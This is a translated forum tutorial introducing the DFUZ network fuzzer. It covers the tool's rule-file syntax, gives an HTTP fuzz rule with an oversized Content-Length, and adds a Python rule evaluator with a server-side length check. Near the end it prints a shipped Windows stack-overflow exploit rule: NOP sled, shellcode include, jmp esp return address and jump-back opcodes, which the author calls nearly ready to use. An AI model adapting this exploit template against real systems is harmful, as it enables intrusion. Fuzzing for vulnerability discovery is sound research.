【Author】: condor
【Author's e-mail】: cracker@vip.qq.com
【Author's homepage】: http://hi.baidu.com/linshifei
【Author's note】: This is purely out of interest, with no other purpose. Corrections of any mistakes from the experts here are welcome!
This time I introduce a fairly simple, entry-level tool: DFUZ.
Download: http://www.genexx.org/dfuz/
It also has a decent track record:
http://www.genexx.org/dfuz/analysis.html
Its strength is convenient data definition; it is simple and easy to use.
The fuzz data is described in a configuration file (*.rule).
The configuration file syntax has a few constructs: data (variables), lists, functions and options.
Examples:
Variables:
var myVar = "Something"
var myVar2 = "String",0x41,|0xdeadbeef|,|0xdeadbeefx5|,|"\x41\x41\x41\x41"x2|,[Bx50],[\x45x6],["Hello"x4],1024,{b040d0b4-b040d0b8- x 1}
var myVar3 = $myVar2
--------------
Lists:
list some_list:
begin
some_data
some_data
some_data
end
--------------
Functions
- %dec2str(num) : Will convert (num) to string and put it. // function description
Example: %dec2str(1024) // invocation
Result: "1024"
---------------
Options
Specify the options for this rule file.
Supported options:
- interact: will do select() between the client and server after processing every "peer" command.
- keep_connecting: this will continue the process even if we cannot connect (in a few words: DON'T EXIT).
- big_endian: will make {} formats big endian (little_endian by default)
- little_endian: will make {} formats little endian (default)
- tcp: will make a stream socket
- udp: will make a datagram socket
- client_side: Will connect to a server. (Default)
- server_side: Will be a server waiting for a connection.
- use_stdout: This option makes the socket stdout instead of a peer; to use it you also need to give "stdout" as the host.
---------
Now let's use the syntax above to look at an example of rules for the HTTP protocol:
For example:
port = 80/tcp
list some_list:
begin
GET
HEAD
end
var get_file = "/index.html"
var content_length = %dec2str(0xffffffff)
peer write: $some_list[rand], $get_file, "HTTP/1.0",0x0d,0x0a
peer write: "Server: www.baidu.com"
peer write: 0x0d,0x0a,"Content-Length: ",$content_length,0x0d,0x0a,0x0d,0x0a
peer read
options = client_side
After reading this, you surely have a clear grasp of the syntax -_-
Using it is just as simple; this starts a fuzz run:
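To make the syntax concrete, here is a small Python evaluator I am adding to this write-up. It is not part of DFUZ and not code from its author; it only re-implements the data forms shown for myVar2 (quoted strings, 0x bytes, |hex| blocks with an optional xN count, [..xN] repeat blocks, $var and $list[rand], %dec2str and bare integers) and renders the "peer write:" lines of the http.rule example into the bytes the client would send. Everything it assumes is marked in the code: an integer literal wider than a byte takes the smallest of 1/2/4 bytes in the rule's endianness, list entries are literal text, elements are concatenated with nothing between them (so the request line comes out as GET/index.htmlHTTP/1.0, exactly as the rule spells it), and the {} range format, %length and %random are not handled. The second half looks at the same bytes from the server's side: a Content-Length of 0xffffffff (4294967295) is exactly the kind of declared length a request parser has to cap before it allocates or reads, and check_content_length does that with a constructed 10 MiB limit.

```python
import random
import re

# Constructed sample: the http.rule walk-through from this post, reduced to the
# statements this toy evaluator understands (lists, vars and "peer write:" lines).
HTTP_RULE = {
    "lists": {"some_list": ["GET", "HEAD"]},
    "vars": {"get_file": '"/index.html"',
             "content_length": "%dec2str(0xffffffff)"},
    "writes": [
        '$some_list[rand], $get_file, "HTTP/1.0",0x0d,0x0a',
        '"Server: www.baidu.com"',
        '0x0d,0x0a,"Content-Length: ",$content_length,0x0d,0x0a,0x0d,0x0a',
    ],
}

# One element of a comma-separated data expression (the forms shown for myVar2).
ELEMENT = re.compile(r'''
      "((?:[^"\\]|\\.)*)"          # 1: quoted string, may contain hex escapes
    | \|([^|]*)\|                  # 2: raw hex block, optional xN repeat suffix
    | \[([^\]]*)\]                 # 3: repeat block: one char, escape or string, N times
    | \$(\w+)(?:\[(\w+)\])?        # 4,5: $var or $list[rand]
    | %(\w+)\(([^)]*)\)            # 6,7: %function(arg)
    | (0x[0-9a-fA-F]+|\d+)         # 8: integer literal
''', re.VERBOSE)
REPEAT = re.compile(r"^(.*)x(\d+)$")   # trailing "xN" repeat count

def unescape(text):
    """Resolve backslash escapes such as \\x41 written inside a rule string."""
    return text.encode("latin-1").decode("unicode_escape").encode("latin-1")

def split_repeat(body):
    """Split an optional trailing xN count off a block body (default 1)."""
    m = REPEAT.match(body)
    return (m.group(1), int(m.group(2))) if m else (body, 1)

def encode_int(value, little_endian=True):
    """Assumption (not stated on the page): an integer literal is emitted in the
    smallest of 1, 2 or 4 bytes, in the rule's endianness (little by default)."""
    width = 1 if value < 0x100 else 2 if value < 0x10000 else 4
    return value.to_bytes(width, "little" if little_endian else "big")

def evaluate(expr, rule, rng=None, little_endian=True):
    """Render one data expression to the bytes it puts on the wire.
    Elements are concatenated as written; commas add no separator bytes."""
    rng = rng if rng is not None else random.Random(0)
    out, pos = bytearray(), 0
    while pos < len(expr):
        if expr[pos] in " ,":
            pos += 1
            continue
        m = ELEMENT.match(expr, pos)
        if not m:
            raise ValueError("unsupported element: %r" % expr[pos:])
        pos = m.end()
        if m.group(1) is not None:                 # "string"
            out += unescape(m.group(1))
        elif m.group(2) is not None:               # |0xdeadbeef|, |0xdeadbeefx5|, |"\x41"x2|
            body = m.group(2)
            body, count = split_repeat(body[2:] if body.lower().startswith("0x") else body)
            out += (unescape(body[1:-1]) if body.startswith('"') else bytes.fromhex(body)) * count
        elif m.group(3) is not None:               # [Bx50], [\x45x6], ["Hello"x4]
            body, count = split_repeat(m.group(3))
            out += unescape(body[1:-1] if body.startswith('"') else body) * count
        elif m.group(4) is not None:               # $var or $list[rand]
            name, index = m.group(4), m.group(5)
            if index is None:
                out += evaluate(rule["vars"][name], rule, rng, little_endian)
            elif index == "rand":                  # assumption: list entries are literal text
                out += rng.choice(rule["lists"][name]).encode("latin-1")
            else:
                raise ValueError("unsupported list index: %s" % index)
        elif m.group(6) is not None:               # only %dec2str is implemented here
            if m.group(6) != "dec2str":
                raise ValueError("unsupported function: %%%s" % m.group(6))
            out += str(int(m.group(7), 0)).encode()
        else:                                      # 0x41, 1024
            out += encode_int(int(m.group(8), 0), little_endian)
    return bytes(out)

def render_rule(rule, seed=0):
    """Join every "peer write:" line into the request the client sends."""
    rng = random.Random(seed)
    return b"".join(evaluate(line, rule, rng) for line in rule["writes"])

MAX_BODY = 10 * 1024 * 1024   # constructed: the largest body this server will buffer

def check_content_length(request, limit=MAX_BODY):
    """Server-side view of the same bytes: accept only a numeric Content-Length that
    fits the buffer. Returns (accepted, declared_length)."""
    head = request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            value = value.strip()
            if not value.isdigit():
                return False, None
            return int(value) <= limit, int(value)
    return True, 0

if __name__ == "__main__":
    wire = render_rule(HTTP_RULE)
    print(wire, check_content_length(wire))
```

render_rule picks GET or HEAD through a seeded random so a run is reproducible; pointing evaluate at the myVar2 line from the syntax section shows each data form rendered to bytes, which is the quickest way to check your reading of a rule before sending it anywhere.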
./dfuz 172.16.3.111 ./rules/http.rule v
I suggest reading more rule files; you will quickly become familiar with how it is used. The ones shipped with the tool live in this directory:
root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# ls
dh2.rule foo-exploit.rule fuzz_local.rule msrpc-1.rule shttp_GET.rule win32-xpl.rule
dhcp-bug.rule foo.rule http.rule my-ftp.rule telnet.rule
Here is another example:
root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# cat win32-xpl.rule
# Some rule to exploit a win32 stack overrun example.
# Diego Bauche
<inc "./vars/shellcodes.vars">
var shellcode = $win32_alnum_scode
var nops_len = %length(1032-$shellcode)
var nops_first = [\x90x$nops_len]
var nops_last = [\x90x36]
# jmp esp - windows 2000 sp0
var eip = |77e822ea|
# Nasty, sub sp, 400 - jmp esp
var jump_back = 0x66,0x81,0xec,0x02,0x04,0x8b,0xec,0xff,0xe4
var payload = $nops_first,$shellcode,%random:dword(),$eip,$nops_last,$jump_back
port=4000/tcp
peer write: $payload
options=
Not too hard, right? Tweak it a bit and it is ready to use; it is easy to generalize from here.
Truly a must-have tool for newbies getting started, for visiting relatives and friends, and for putting on airs -_-
- Title: Software Vulnerability Discovery Fuzz Tools, Part 4: Dfuz
- Author: condor
- Date: 2008-08-05 13:29
- Link: http://bbs.pediy.com/showthread.php?t=70045